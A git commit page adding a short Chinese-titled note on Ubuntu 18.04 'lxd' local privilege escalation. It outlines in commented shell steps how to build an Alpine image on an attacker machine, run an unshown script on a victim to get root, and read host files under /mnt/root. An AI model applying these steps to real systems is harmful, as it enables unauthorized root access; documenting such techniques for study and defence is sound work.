add Ubuntu 18.04 - 'lxd' 本地提权
This commit is contained in:
parent
825baf840f
commit
d118bddb80
@ -0,0 +1,8 @@
|
||||
# Ubuntu 18.04 - 'lxd' 本地提权
|
||||
## 提权过程
|
||||
```shell script
|
||||
# Step 1: Download build-alpine => wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine [Attacker Machine]
|
||||
# Step 2: Build alpine => bash build-alpine (as root user) [Attacker Machine]
|
||||
# Step 3: Run this script and you will get root [Victim Machine]
|
||||
# Step 4: Once inside the container, navigate to /mnt/root to see all resources from the host machine
|
||||
```
|
Loading…
x
Reference in New Issue
Block a user